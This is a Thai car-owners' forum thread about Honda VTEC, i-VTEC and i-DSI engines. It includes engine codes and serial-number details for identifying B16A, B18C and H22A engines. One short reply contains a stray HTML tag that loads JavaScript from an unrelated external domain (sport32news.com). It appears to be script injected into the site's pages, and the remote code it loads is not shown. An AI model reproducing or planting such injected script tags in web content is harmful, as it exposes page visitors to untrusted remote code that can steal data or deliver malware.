ตอบ
Champ_civicES


ชื่อเล่น: แชมป์

เข้าร่วม: 16 พฤศจิกา 2010
ตอบ: 982

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1676
ให้คำขอบคุณ: 4291

ที่อยู่: จรัญ13
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 ธันวา 2011 16:33 - ระบบเครื่องยนต์VTEC
ถ้าซ้ำก้ขออภัยครับผม

VTEC ย่อมาจากคำเต็มว่า Variable valve Timing and lift Electronic Control เป็นระบบเครื่องยนต์ของฮอนด้า ที่เพิ่มประสิทธิภาพของเครื่องยนต์ในขณะที่ทำงานที่รอบสูง ให้มีประสิทธิภาพดียิ่งขึ้น

แบ่งออกเป็น

DOHC VTEC
SOHC VTEC
SOHC VTEC-E
3-Stage VTEC
i-VTEC

เครื่องยนต์ VTEC ทำงานอย่างไร ?
VTEC คือระบบป้อนไอดีให้เครื่องยนต์ที่เป็นลิขสิทธิ์เฉพาะของฮอนด้าระบบควบคุมจังหวะและระยะยกตัวของลิ้นไอดีที่ควบคุมโดยอิเล็คทรอนิก การทำงานของเครื่องยนต์ VTEC (Variable Valve Timing and Lift Electronic Control) ในเครื่องยนต์ชนิดลูกสูบโดยทั่วไปนั้น มีระบบที่สำคัญต่อการทำงานอยู่สองระบบ คือ ระบบไอดี และ ระบบไอเสีย ระบบไอดีคือระบบที่ทำหน้าที่ป้อนส่วนผสมระหว่างน้ำมันเชื้อเพลิงกับอากาศ ซึ่งผสมกันโดยใช้หัวฉีดหรือคาร์บูเรเตอร์ ก่อนจะส่งเข้าสู่ห้องเผาไหม้โดยอาศัยความแตกต่างของแรงดันระหว่างที่ลูกสูบเคลื่อนตัวลง ปริมาณของไอดีที่ป้อนเข้าห้องเผาไหม้

นอกจากจะขึ้นอยู่กับปริมาณอากาศที่ควบคุมโดยมุมเปิดของลิ้นปีกผีเสื้อและต่อโดยตรงอยู่กับแป้นคันเร่งซึ่งจะเป็นสัดส่วนที่ถูกต้องกับปริมาณน้ำมันเชื้อเพลิงที่ฉีดเข้าไปผสมโดยการคำนวณของกล่องคอมพิวเตอร์ควบคุมแล้ว ยังขึ้นอยู่กับระยะเปิดและขนาดของลิ้นไอดีด้วย แต่ที่ความเร็วรอบเครื่องยนต์สูงสิ่งที่เรามักจะสูญเสียไปคือแรงบิดซึ่งเป็นสิ่งที่จะช่วยให้เครื่องยนต์มีกำลังฉุดลากเพิ่มขึ้น

ความต้องการกำลังฉุดลากเพิ่มขึ้นนี้จะสังเกตได้ชัดเจนเวลาที่เราใช้เกียร์สูงอยู่แล้วแต่ต้องการเร่งแซงรถคันหน้าให้พ้นในเวลาคับขัน เรามักจะใช้วิธีเลื่อนเกียร์ลงต่ำเพื่อให้ได้กำลังฉุดลากมากขึ้น ความเร็วรอบของเครื่องยนต์ก็จะพุ่งขึ้นสูง แต่ในทางกลับกันเมื่อความเร็วรอบเครื่องยนต์สูงก็จะทำให้แรงบิดต่ำลง กำลังฉุดลากก็จะต่ำไปด้วย เราจึงมักจะรู้สึกว่ารถแซงไม่ทันใจ สาเหตุที่เป็นดังนั้นเพราะที่ความเร็วรอบของเครื่องยนต์สูงๆ ไอดีจะไหลเข้าห้องเผาไหม้ไม่ทันเนื่องจากต้องผ่านช่องที่เกิดจากการยกตัวของลิ้นไอดีคงที่เท่ากับตอนที่เครื่องยนต์หมุนด้วยความเร็วต่ำๆ เพราะลิ้นไอดีเปิดได้ด้วยลูกเบี้ยวที่กดลงบนก้านลิ้นซึ่งลูกเบี้ยวย่อมมีระยะยกตัวคงที่
วิศวกรจึงคิดค้นสร้างลูกเบี้ยวขึ้นมาอีกชุดหนึ่ง มีระยะยกตัวสูงกว่าลูกเบี้ยวชุดเดิม สร้างระบบควบคุมการทำงานขึ้นมาอีกชุดหนึ่งทำงานด้วยอิเล็คทรอนิก บังคับให้ลิ้นไอดีใช้ความสูงของลูกเบี้ยวชุดที่สองเมื่อถึงความเร็วที่จำเป็น ปริมาณไอดีสามารถป้อนเข้าห้องเผาไหม้ได้มากขึ้น แน่นอนว่าเครื่องยนต์ก็จะมีกำลังมากขึ้น มีแรงบิดและแรงฉุดมากขึ้นที่ความเร็วสูง ผลก็คือทำให้เร่งความเร็วได้ทันใจมากขึ้น


เครื่องยนต์ VTEC LEV ทำงานอย่างไร ?

เครื่องยนต์ VTEC LEV คือเครื่องยนต์ที่ประสานคุณสมบัติของ VTEC เข้ากับคุณสมบัติการเป็นเครื่องยนต์ที่ให้

มลพิษต่ำ ฮอนด้ากำหนดมาตรฐานของยานยนต์มลพิษต่ำของตัวเองว่า ระดับมลพิษในไอเสียต้องต่ำกว่าที่กฎหมายกำหนดไม่น้อยกว่า 80%แต่ต้องยังคงสมรรถนะทางกำลังของเครื่องยนต์ไว้ได้อย่าง เครื่องยนต์ VTEC LEV ประกอบด้วยลักษณะเด่นสามประการ

ประสิทธิภาพการประจุไอดี โดยการออกแบบขนาดและตำแหน่งของลิ้นไอดีร่วมกับการทำงานของ VTEC เครื่องยนต์ VTEC LEV จะให้ประสิทธิภาพในการประจุไอดีสูง ทำให้ได้ส่วนผสมระหว่างอากาศและน้ำมันเชื้อเพลิงในอัตราที่เหมาะสม

ประสิทธิภาพในการเผาไหม้ ด้วยวงจรควบคุมที่ออกแบบใหม่และการทำงานของเซนเซอร์ที่มีความแม่นยำมากขึ้น การฉีดน้ำมันเชื้อเพลิงและการจุดระเบิดจะสามารถกระทำด้วยปริมาณและจังหวะที่เหมาะสมกับสภาวะต่างๆของเครื่องยนต์สูงสุด
ประสิทธิภาพในการกรองไอเสีย เครื่องกรองไอเสียแบบสามทางใหม่ที่เพิ่มพื้นที่การกรองให้มากขึ้นรวมกับตัวตรวจจับออกซิเจนใหม่ ทำให้การกรองไอเสียมีประสิทธิภาพมาก


เครื่องยนต์ i-VTEC ทำงานอย่างไร ?


เครื่องยนต์ i-VTEC เป็นพัฒนาการใหม่ของเครื่องยนต์ VTEC โดยผนวกเทคโนโลยี VTC (Variable Timing Control) เข้ากับระบบ VTEC อันเลื่องชื่อของฮอนด้า

คงเป็นที่ทราบกันดีแล้วว่าระบบ VTEC เป็นระบบที่เพิ่มประสิทธิภาพการประจุไอดีโดยใช้ชุดลูกเบี้ยวพิเศษที่มีความสูงมากกว่าปกติทำงานแทนลูกเบี้ยวชุดเดิมเมื่อเครื่องยนต์มีความเร็วรอบสูงขึ้น กระบวนการควบคุมให้

ลูกเบี้ยวตัวสูงส่งแรงกดไปยังกระเดื่องวาล์วนี้อาศัยแรงดันของน้ำมันเครื่อง โดยมีกล่องคอมพิวเตอร์ทำหน้าที่

ควบคุมจังหวะการทำงานของระบบ VTEC ให้สัมพันธ์กับการขึ้นลงของลูกสูบและความเร็วในขณะนั้น การทำงานอย่างแม่นยำของกล่องคอมพิวเตอร์ได้มาจากสัญญาณของตัวตรวจจับ(เซนเซอร์)จำนวนมาก เครื่องยนต์ VTEC จึงเป็นเครื่องยนต์ที่มีสมรรถนะสูงเมื่อเทียบกับเครื่องยนต์ขนาดเดียวกันแต่ไม่มีระบบ VTEC

แต่การทำงานของระบบ VTEC นั้นเกิดขึ้นที่ความเร็วรอบเครื่องยนต์จุดใดจุดหนึ่งเป็นต้นไปและจะทำงานด้วยจังหวะและระยะเปิดของวาล์คงที่ แม้จะได้ประสิทธิภาพการเผาไหม้เพิ่มขึ้นแต่ก็เป็นการเพิ่มที่มีอัตราคงที่ตามความเร็วของเครื่องยนต์ วิศวกรพบว่าหากสามารถปรับเปลี่ยนจังหวะการเปิดปิดของวาล์วเมื่อเปรียบเทียบกับจังหวะการเลื่อนขึ้นลงของลูกสูบให้เร็วขึ้นหรือช้าลงได้ก็จะทำให้ปริมาณการประจุไอดีสัมพันธ์กับความต้องการของเครื่องยนต์ยิ่งขึ้น ผลก็คือจะได้กำลังและแรงบิดของเครื่องยนต์เพิ่มขึ้นจากการเผาไหม้น้ำมันเชื้อเพลิงปริมาณเท่าเดิม

การทำให้ตำแหน่งเริ่มเปิดหรือเริ่มปิดของวาล์วไอดีผันแปรไปทำได้โดยหมุนเปลี่ยนตำแหน่งเพลาราวลิ้นให้ความสัมพันธ์ของเพลาราวลิ้นกับเพลาข้อเหวี่ยงเปลี่ยนไป ในเครื่องยนต์ i-VTEC (I= Intelligence) ที่ปลายเพลาราวลิ้นด้านไอดีบริเวณเฟืองขับจะมี VTC Actuator ประกอบอยู่ อุปกรณ์นี้ทำหน้าที่ปรับเปลี่ยนองศาที่ลูกเบี้ยวเริ่มแตะก้านวาล์วให้เร็วขึ้น( Advance) หรือช้าลง( Retard) การทำงานจะใช้แรงดันน้ำมันเครื่องที่จ่ายให้กับห้องน้ำมันในอุปกรณ์ดังกล่าวไปดันให้ใบพัด ( Vane) ซึ่งต่ออยู่กับเพลาราวลิ้นขยับตัวไปยังตำแหน่งที่ต้องการ แรงดันที่จ่ายให้กับห้องน้ำมันของ Actuator จะถูกควบคุมโดยกล่องคอมพิวเตอร์ควบคุมการทำงานของเครื่องยนต์ซึ่งประมวลผลจากสัญญาณที่ได้รับจากตัวจับสัญญาณ(เซนเซอร์)ดังได้กล่าวมาแล้ว





เครื่องยนต์ i-DSI ทำงานอย่างไร ?

เครื่องยนต์ i-DSI (Intelligent-Dual Sequential Ignition) คือเครื่องยนต์ชนิดที่มีหัวเทียนสำหรับจุดระเบิดสองหัวต่อหนึ่งกระบอกสูบ หัวเทียนทั้งสองจะจุดระเบิดส่วนผสมระหว่างน้ำมันเชื้อเพลิงกับอากาศด้วยจังหวะที่แตกต่างหรือพร้อมกันแล้วแต่สภาวะการทำงานของเครื่องยนต์ในขณะนั้น กล่าวคือที่ความเร็วรอบต่ำหัวเทียนด้านลิ้นไอดีจะจุดก่อนแล้วตามดัวยหัวเทียนด้านลิ้นไอเสีย ระยะเวลาที่ห่างกันจะเป็นเท่าใดขึ้นอยู่กับการคำนวณของกล่องควบคุม แต่ที่ความเร็วรอบสูง หัวเทียนทั้งสองจะจุดระเบิดพร้อมกัน ลักษณะเช่นนี้จะทำให้การเผาไหม้เป็นไปอย่างสมบูรณ์ยิ่งขึ้น โดยเฉพาะในเครื่องยนต์ชนิดเผาไหม้ส่วนผสมบาง ( Lean burn)
ได้รับคำขอบคุณจาก: khem_hatyai  BallBall  ming  kantaphat  puyzaaaaa  undertee  piriyod  tun221 
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 ธันวา 2011 18:33 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
Ball Featuring


ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

ที่อยู่: พิษณุโลกBIG C
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 19 ธันวา 2011 19:40 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
ข้อมูลเยอะอ่านแล้วลายตาจัง "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: puyzaaaaa 
ming


ชื่อเล่น: หมิง

เข้าร่วม: 24 สิงหา 2009
ตอบ: 617

Guru ES
Guru ES

ได้รับคำขอบคุณ: 844
ให้คำขอบคุณ: 1701

ที่อยู่: บางปู สมุทรปราการ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 ธันวา 2011 20:19 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
ลายตาไปหมดเลย ขอบคุณครับ ความรู้เข้าไปวิ่งในหัวสมองเพิ่มขึ้นอีกแล้ว
ได้รับคำขอบคุณจาก: Champ_civicES 
Champ_civicES


ชื่อเล่น: แชมป์

เข้าร่วม: 16 พฤศจิกา 2010
ตอบ: 982

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1676
ให้คำขอบคุณ: 4291

ที่อยู่: จรัญ13
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 ธันวา 2011 23:25 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
a_na_kim


ชื่อเล่น: คิม

เข้าร่วม: 02 สิงหา 2011
ตอบ: 474

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 274
ให้คำขอบคุณ: 1

ที่อยู่: พระประแดง สมุทรปราการ / นครราชสีมา
ปี: 2002
จันทร์, 19 ธันวา 2011 23:36 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
asaweenaruk


ชื่อเล่น: เฉียง

เข้าร่วม: 04 มีนา 2009
ตอบ: 287

ผู้ใช้นี้มีความผิด
ผู้ใช้นี้มีความผิด

ได้รับคำขอบคุณ: 382
ให้คำขอบคุณ: 227

ที่อยู่: ผิดกฎ: ปั่น Thanks
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 21 ธันวา 2011 02:01 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
DOHC VTEC
SOHC VTEC
2อันนี้ต่างกันยังไงคับ แล้วcivic01 เปนแบบไหนคับ ขอบคุนคับ
yuncup2008


เข้าร่วม: 05 พฤศจิกา 2008
ตอบ: 427

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 420
ให้คำขอบคุณ: 68

ที่อยู่: สงขลา
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 21 ธันวา 2011 05:27 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 ธันวา 2011 10:46 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
ใช้รถอยู่ตั้งนาน แต่ไม่เคยรู้เรื่องนี้เลย
onut0627


เข้าร่วม: 24 กันยา 2011
ตอบ: 179

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 208
ให้คำขอบคุณ: 87
พุธ, 21 ธันวา 2011 16:38 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
:D
Turngkung P 11


ชื่อเล่น: เติ้ง

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1656

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2557
ให้คำขอบคุณ: 3623

ที่อยู่: SaPanMai
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 21 ธันวา 2011 21:51 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
เจ้าของกระทู้นี่หายไปเร้ยยยยยยยยยยยยยยยยยย
Champ_civicES


ชื่อเล่น: แชมป์

เข้าร่วม: 16 พฤศจิกา 2010
ตอบ: 982

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1676
ให้คำขอบคุณ: 4291

ที่อยู่: จรัญ13
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 ธันวา 2011 21:53 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
NutNicha


ชื่อเล่น: นัท

เข้าร่วม: 21 พฤษภาคม 2013
ตอบ: 463

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 314
ให้คำขอบคุณ: 106

ที่อยู่: ราชบุรี
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 25 ตุลา 2013 13:18 - รายชื่อเครื่องยนต์ฮอนด้า
 พอดีไปอ่านเจออ่ะคับ....ถ้าซ้ำต้องขออภัยด้วยคับ
อ้างอิงจาก:
เครื่องยนต์ฮอนด้า เป็นเครื่องยนต์สำหรับรถยนต์ที่ผลิตโดย บริษัท ฮอนด้ามอเตอร์ แห่งประเทศญี่ปุ่น

[url]th.wikipedia.org/wiki/รายชื่อเครื่องยนต์ฮอนด้า[/url]
VTEC = Variable value Timing and value lift Electronic Control system แปลว่า ระบบควบคุมการเปลี่ยนแปลงองศาเปิดและปิดด้วยอิเล็กทร อนิกส์

เป็นการนำเอาComputerที่นอกจากจะควบคุมการจ่ายน้ำมัน และระบบจุด ระเบิดแล้วยังนำมาควบคุมการเปลี่ยนแปลงองศาการเปิดและปิด ของลิ้นไอดีและไอเสียที่ความเร็วรอบของเครื่องยนต์ที่แตกต่างกัน ระหว่างความเร็วรอบต่ำและสูง ทำให้สามารถเพิ่มกำลังของเครื่องยนต์ได้ เนื่องจากการควบคุมการประจุไอดีและองศาการจุดระเบิดของเครื่องย นต์ โดยใช้ระบบMechanicที่มีอยู่ในตัวเครื่องโดยComputerจะควบคุมกลไกการทำงานของกระเดื่องลิ้น

เครื่อง VTEC มีจำหน่ายตั้งแต่ปี 1989 ในรุ่น Civic EF9 , CR-X EF2 , INTEGRA DA6,8 เป็นเครื่อง B16A รุ่นแรก (vtecเล็ก) 160PS หลังจากนั้นได้ปรับปรุงเพิ่มสมรรถนะของเครื่องใหม่ เพิ่มแรงม้าและแรงบิด กลายเป็นเครื่อง B16A VTEC ใหญ่ 170PS จะอยู่ในบอดี้ Civic SIR EG9 (ซีวิค3ประตู) , SIR II EG6 (รุ่น4ประตู) , CR-X SIR EG2 (Delsol) ต่อมาได้ปรับปรุงบอดี้กลายเป็นรุ่น EK (ซีวิคตาโต) เครื่องยนต์ยังคงเป็น B16A VTECใหญ่ ปรับปรุงรายละเอียดเล็กน้อย และยังมี version พิเศษเป็น Civic Type R โดยนำรุ่นตาโต3ประตูมาแต่งเติมทั้งภายในและภายนอก ใช้เครื่องยนต์ตัวใหม่ B16B 185PS เป็นเครื่องที่ออกแบบมาเป็นพิเศษสำหรับรุ่นนี้โดยเฉพาะ มีการปรับปรุงแรงบิดและแรงม้าให้มากขึ้นกว่าเดิม

เครื่องยนต์ VTEC จะแตกต่างจากเครื่องยนต์ตัวอื่น

1 LOST MOTION ASSEMBLY (กลไกดันกระเดื่องกดลิ้นตัวกลาง) ทำหน้าที่เป็นสปริงดันให้กระเดื่องกดลิ้นตัวกลางเลื่อนกลับในตำแหน่งเดิม มีหน้าที่เป็นตัวช่วยlockกระเดื่อง

2 HYDRAULIC PRESSURE CONTROL (กลไกควบคุมแรงดันไฮโดรลิก) ECUจะควบคุมการทำงานของ Solinoid & Pressure switch เมื่อถึงรอบที่กำหนด (5700rpm standard) ECU จะส่งสัญญาณ Pulse ไปสั่งให้ Solinoid ทำงาน แรงดันน้ำมันจะดันลูกสูบภายใน Rocker Arm เอาชนะแรงดัน Spring ที่ดันลูกสูบไว้ ทำให้ชุดกระเดื่องทำงาน (B16Aปี96 , B18Cปี96,98 และรุ่นใหม่ๆจะไม่มี Pressure Switch)

ECU จะมีหน้าที่รับ factor ต่างๆจากเครื่อง - Engine Speed - Engine Load - Vehicle Speed - Water Temperature ทำการประมวลผลและสั่งการไปที่เครื่องยนต์ เพื่อทำให้เครื่องทำงานเป็นปกติเหมาะสมกับการทำงานใน ขณะนั้น

แรงดันน้ำมันเครื่อง จะทำงานอยู่ที่ 0.7-4.0 BAR ขึ้นกับความเร็วของรอบเครื่อง เพื่อทำให้ระบบVTECทำงานโดยผ่าน Solinoid

B16A

เครื่องยนต์ B16A ตัวนี้นั้นจัดได้ว่าเป็น VTEC DOHC รุ่นแรกใน CIVIC จะสังเกตได้ว่าเป็นเครื่องที่เรียกกันติดปากว่า VTEC เล็ก โดยดูตัวอักษร VTEC จะเล็กกว่า DOHC อยู่บนฝาครอบวาล์ว จากนั้นมการเปลี่ยนโฉมเป็นรุ่นฮิต 3 ประตู ก็ปรับปรุงสมรรถนะมากขึ้น เพิ่มแรงบิด แรงม้า เป็น B 16 A VTEC ใหญ่ (ตัว VTEC ใหญ่กว่า DOHC) ต่อมาเปลี่ยนเป็นรุ่นตาโต ก็ยังเป็นเครื่องตัวเดิมอยู่ จากนั้นทำ 3 ประตูตาโตออกมาก็เปลี่ยนเป็นเครื่อง B16B ตัวแรง แต่งพิเศษ

B18C

ทีนี้เป็นเครื่องที่ใหญ่ขึ้นมาอีกระดับหนึ่ง ซึ่งเจ้าตัว B18C นี้จะอยู่ใน INTREGA รหัส DC2 (DC1 เป็นเครื่องZC 1600CC) จะเป็นทั้งตัว ธรรมดา และ Type R ด้วย โดยตัวหลังจะปรับปรุงทั้ง แรงม้า แรงบิด เพิ่มกำลังอัดและเปลี่ยนโปรแกรมควบคุมใหม่ ให้เพิ่มมากขึ้น จนได้แรงม้า 200 ตัว

H22A

เครื่อง VTEC ตระกูล H22A ที่วางทั้ง ACCORD CD6 และ PRELUDE BB4 ที่มีการเปลี่ยนโฉมกันใหม่ในปี 1996 - 1997 และในPRELUDE BB6 รุ่นใหม่ปี98จะเป็นเครื่องยนต์ H22A รุ่น 220 แรงม้า กับรุ่น 200 แรงม้า

ความแตกต่างของเครื่อง VTEC

B16A VTEC เล็ก

โดยอาศัยตัวอักษร VTEC ที่มีขนาดเล็กอยู่ใต้ตัวอักษร DOHC ที่มีขนาดใหญ่กว่า รางหัวฉีดเข้าเครื่องจะมีลักษณะทรงกลมขนาดใหญ่ ถัดจากรางหัวฉีดจะเห็นท่อไอดีเขียนคำว่า PGM-FI ตัวนูน คลัตช์เป็นแบบสาย ที่เกียร์จะไม่มีปั๊มคลัตช์ เลขเครื่องเริ่มตั้งแต่ 1000000 ขึ้นไป ตัวเลขจะมีหลัก ผลิตตั้งแต่ปี 1990 ถึง 1991

B16A VTEC ใหญ่

ตัวอักษร VTEC จะมีขนาดใหญ่หว่า ตัวอักษร DOHC รางหัวฉีดเป็นแบบแบน และไม่มีอักษรใดๆบนท่อไอดี แต่จะเป็นเปลายขวางแทน ระบบคลัตช์เป็นแบบน้ำมัน ที่เกียร์จะมีปั๊มคลัตช์อยู่ เลขเครื่องยนต์ 7 หลัก สองหลักแรกเริ่มตั้งแต่ 54 ถึง 57 ส่วนปีใหม่กับปีเก่าของเครื่องตัวนี้ดูจาก Vacuum เซ็นเซอร์ ถ้าเซ็นเซอร์แยกออกมาจากเครื่องจะมีเลขเครื่องตั้งแต่54-55 หรือปี 1992-1993 แต่ถ้าเป็นตัวเซ็นเซอร์อยู่บนลิ้นปีกผีเสื้อ จะมีเลขเครื่องตั้งแต่ 56-57 หรือปี 1993-1994 และเครื่องยนต์ที่มีเลขตั้งแต่ 56 ขึ้นไปจะมี Limited Slip มาให้ด้วย B16A-170ม้า body ตาโตเลขเริ่มต้นที่ 58 - 63 เป็น ปี 96-2000 จะเป็นกล่องยาว(E CU)

B16B VTEC

ฝาครอบวาล์วจะเป็นสีแดงเด่นชัด รางหัวฉีดเป็นแบบกลมเหมือน VTEC เล็ก แต่จะมีขนาดลิ้นปีกผีเสื้อที่ใหญ่ขึ้น เลขเครื่องเริ่มตั้งแต่ 1 ขึ้นไปหรือปี 1997 ขึ้นไป ในปีใหม่กว่านี้จะมีขนาดของปั๊มช่วยผ่อนแรงพวงมาลัยที่เล็กลงด้วย

B18C VTEC

ลักษณะของท่อไอดีจะเปลี่ยนเป็นแบบคว่ำลงรางหัวฉีดเป็นแบบกลม Vacuum จะอยู่บนตัวเรือนลิ้นปีกผีเสื้อ เลขเครื่องจะเริ่มตั้งแต่ 10 ขึ้นไป ผลิตปี 1992 เลขเครื่อง 11 ผลิตปี 1993 เลขเครื่อง 12 ผลิตปี 1994-1997 ในปีที่มีเลขเครื่อง 10-12 กล่องควบคุมจะสั้น ส่วนตั้งแต่เลขเครื่อง 12 กล่องควบคุมจะยาว และขนาดปั๊มพาวเวอร์ที่เล็กลง เครื่องตั้งแต่ปี 1995 จะมี Limited Slip มาให้ด้วย

B18C VTEC Type-R

ลักษณะเด่นของ Type-R คือฝาครอบวาล์วจะมีสีแดงเด่น ท่อไอดีจะเหมือนกับ B16A แต่จะใหญ่กว่า มีรางหัวฉีดกลมขนาดใหญ่ ฝาครอบสายหัวเทียน 98เป็นลายcevlar 96 เป็นสีเงินธรรมดา ปั๊มพาวเวอร์เล็กแต่สายน้ำมันพาวเวอร์จะใหญ่ เลขเครื่อง 19 ผลิตปี 1996 เลขเครื่อง 20 ผลิตปี 1997 เลขเรื่อง 21 ผลิตปี 1998 ขึ้นไป และอยู่ในรุ่น INTEGRA ที่มีดุมล้อ 5 รู 98ท่อร่วมไอเสียจะเป็นท่อแยก(เฮดเดอร์จากโรงงาน) 96จะเป็นท่อไอเสียแบบปกติทั่วไป

H22A VTEC

เป็นเครื่องที่มีขนาดใหญ่ ถ้ามีแรงม้า 200 เลขเครื่อง 10 ผลิตปี 1991-1992 เลขเครื่อง 11 ผลิตปี 1993-1994 เลขเครื่อง 20 ขึ้นไปผลิตปี 1995-1996 ส่วนที่อยู่ใน PRELUDE ตัว 200 แรงม้า จะผลิตปี 1997 ขึ้นไปมีดุมล้อ 5 รู ส่วนเครื่องที่มีแรงม้า 220 จะมีฝาครอบวาล์วเป็นสีแดง อยู่ใน PRELUDE ตัว Type-S ตั้งแต่ปี 1997 เลขเครื่องตั้งแต่ 40 ขึ้นไป ดุมล้อเป็นแบบ 5 รู ในตัว ACCORD ตัว 190 แรงม้า ตัวนี้ VTEC จะเปิดเร็วกว่าในตัว PRELUDE ผลิตปี 1992-1997

สาระน่ารู้เกี่ยวกับVTEC

ส่วนเรื่องเกียร์ LSD นั้นจะเป็น option สำหรับเครื่อง B16A ตั้งแต่เลขเครื่อง56xxxxxเป็นต้นไป ส่วน B18C จะเริ่มที่101xxxx แต่ถ้าเป็นเครื่องฝาแดงแล้วจะมี LSD ให้ทุกเครื่อง เกียร์ LSD

เครื่อง B16A เลขเครื่องตั้งแต่ 5700000 ขึ้นไปจะไม่มีปลั๊กเขียวเซ็นเซอร์ใต้ โซลินอยด์ วีเทค อยู่ใกล้จานจ่าย เป็นตัวกลมๆ ถ้าเป็น B18C ฝาดำถ้าเป็นตัว 180 แรงม้าก็จะไม่มีปลั๊กเขียวนี้เช่นกัน ส่วนเครื่องฝาแดงทั้งหมดจะไม่มีปลั๊กเขียวตัวนี้ แต่ถ้าเป็นฝาแดงรุ่นเฉพาะสหรัฐอเมริกาจะมีปลั๊กตัวนี้

เครื่อง B16A เลข 5800000 ในรุ่นตาโตจะมีเซนเซอร์วัดปริมาณอากาศอยู่ที่ท่อยาง ก่อนเข้าไอดี และก็ไม่มีตัวเซ็นเซอร์ตรงเขาไอดีช่วงท่อ1และ2จะเป็น รอยอุดธรรมดา แต่ถ้าเป็นตัวก่อนหน้านี้ที่อยู่ในบอดี EG ทั้งหมดหรือ CRX จะมีเซ็นเซอร์อยู่ตรงเขาไอดีเท่านั้น ไม่มีตรงท่อยางก่อนเข้าคอไอดี

เครื่อง B18Cฝาดำ ถ้าเป็นตัว 180 แรงม้า ตรงคอไอดีจะมีตุ่ม 2 เม็ดแต่มันก็ไม่ได้มีผลเกี่ยวกับเครื่องมันดูเป็นรุ่ นใหม่มากกว่า ก็เช่นเดียวกับเสื้อเกียร์ถ้าเป็น 180 แรงม้า และ B16A ของบอดี้ตาโตขึ้นไปจนกระทั่งฝาแดงจะมีรูอยู่ 2 รูอยู่ด้านหน้าไกล้ ๆ เลขเครื่อง เครื่องฝาแดง เหล็กยึดไดร์ชาร์ตดูเหมือนจะเป็นสนิมแต่เขาจงใจทำมา แต่ถ้าเป็นพวก B16 หรือ B18 จะเป็นเหล็กพ่นสีดำ

ปีที่ผลิตของเครื่อง ก็จะดูได้ที่ฝาสูบด้านหน้าไกล้ ๆ คอไอเสีย อาจจะมองยากสักหน่อยเพราะมีเหล็กกันความร้อนของท่อบั งอยู่ โดยจะยึดเอาเลข3ตัวจากซ้ายเป็นหลัก จะบอกเป็น ปี-เดือน-วัน ในการผลิต เครื่อง เช่น 7-04-15 หมายถึง ผลิตปี97 เดือน4 วันที่15รายชื่อเครื่องยนต์ฮอนด้าจากวิกิพีเดีย สารานุกรมเสรี
ได้รับคำขอบคุณจาก: army-mafia46  boyboom_16  black_civic_es  yam  okuma  K-yuthya  bhumipat  davidian  tokmun002 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 25 ตุลา 2013 13:35 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
..
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 25 ตุลา 2013 13:37 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
..
